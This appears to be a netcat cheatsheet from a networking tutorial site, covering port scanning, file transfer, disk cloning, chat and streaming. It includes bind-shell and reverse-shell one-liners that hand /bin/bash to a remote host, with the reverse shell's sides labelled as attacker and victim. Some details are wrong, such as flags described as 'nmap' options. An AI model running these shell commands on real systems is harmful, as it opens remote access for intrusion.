Netcat (nc) Command Cheatsheet
Comprehensive Netcat (nc) guide covering TCP/UDP connections, port scanning, file transfers, encryption, remote shells, and network troubleshooting. Master the Swiss Army knife of networking tools.
Free account required
Netcat Syntax
$ nc [options] [host] [port]
Description:
The nc (or netcat) utility is used for almost anything involving TCP, UDP, or UNIX sockets.
It can establish TCP connections, send UDP packets, listen on arbitrary TCP and UDP ports,
perform port scanning, and handle
IPv4 and IPv6. Master netcat alongside our basic networking operations
guide.
Table of Contents
Port Scanning and Banner Grabbing
Scan for ports between 1 and 100
$ nc -zvn 192.168.59.1 1-100Scan ports 1, 22 and 443
$ nc -zvn 192.168.59.1 80 22 443Scan only port 80
$ nc -zvn 192.168.59.1 80Scan for port 80 on sysxplore.com
$ nc -zvn sysxplore.com 80Grab sysxplore.com 80 banner
$ nc sysxplore.com 80
🔍 Network diagnostic tools: Use our Port Scanner for automated port
scanning |
DNS
Lookup for domain resolution |
WHOIS
for domain information
📚 Learn more: Linux Networking Commands for network
troubleshooting
Downloading Files
Sending Side (192.168.59.3)
$ nc -lvp 8888 < data.txtReceiving Side
$ nc -nv 192.168.59.3 8888 > data.txtUploading Files
Receiving Side (192.168.59.3)
$ nc -lvp 8888 > data.txtSending Side
$ nc 192.168.59.3 8888 < data.txtCompress and Transfer
This is very useful when you want to transfer directories
Sending Side
$ tar cfp - /webdocs | compress -c | nc 192.168.59.54 8888Receiving Side (192.168.59.54)
$ nc -l -p 8888 | uncompress -c | tar xvfp -Encrypt and Transfer
File transfers using netcat are not encrypted by default, anyone on the network can grab what you are sending, so it is important to encrypt data before sending. For production environments, consider using secure SSH file transfer alternatives. Learn more about security best practices.
Sending Side (192.168.59.3)
$ nc -l -p 8888 | openssl enc -d -des3 -pass pass:password > creds.txtReceiving Side
$ openssl enc -des3 -pass pass:password | nc 192.168.59.3 8888Cloning Linux Disk Drive
This is very handy when you want to clone a Linux system.
Sending Side (192.168.59.3)
$ dd if=/dev/sdb | nc -l -p 8888Receiving Side
$ nc -n 192.168.59.3 8888 | dd of=/dev/sdbRemote Shell
Server (192.168.59.3)
$ nc -nvlp 8888 -e /bin/bashClient
$ nc -nv 192.168.59.3 8888Security Warning: Remote shell access should only be used in controlled environments. Always use SSH for production systems. Review our secure remote access practices.
Reverse Shell
Attacker's Machine (192.168.59.3)
$ nc -nlvp 8888Victim's Machine
$ nc 192.168.59.3 8888 -v -e /bin/bashSecurity Alert: This technique is commonly used in security testing. Never use reverse shells on systems without proper authorization. Implement security hardening practices and use secure alternatives in production.
Video Streaming
Server (192.168.59.3)
$ cat video.avi | nc -lvp 8888Client
$ nc 192.168.59.3 8888 | mplayer -vo x11 -cache 3000 -Chat Application
Server (192.168.59.3)
$ nc -lvp 8888Client
$ nc 192.168.59.3 8888Common Flags and Options
| Flag | Description |
|---|---|
| -4 | Forces nc to use IPv4 addresses only. |
| -6 | Forces nc to use IPv6 addresses only. |
| -l | Instruct netcat to listen for incoming connections. |
| -v | Provide verbose output. |
| -n | Disable DNS lookup on ip addresses and hostnames. |
| -p | Specifies the source port netcat should use. |
| -w | Specifies the timeout value. |
| -u | Use UDP instead of the default option of TCP. |
| -k | Forces netcat to continue listening after disconnection. |
| -z | Instructs nmap to scan for listening daemons. |
| -h | Show nmap help. |
| -x | Use nmap with a proxy. |
📖 Command references: Basic Linux Commands |
Network troubleshooting guide
🛠️ Network tools: Explore our diagnostic tools collection
Master Network Testing & Security
Need powerful servers for network testing and security operations? Compare VPS providers with optimal network performance, explore side-by-side comparisons, monitor your network infrastructure, and learn from our networking guide and secure server access best practices.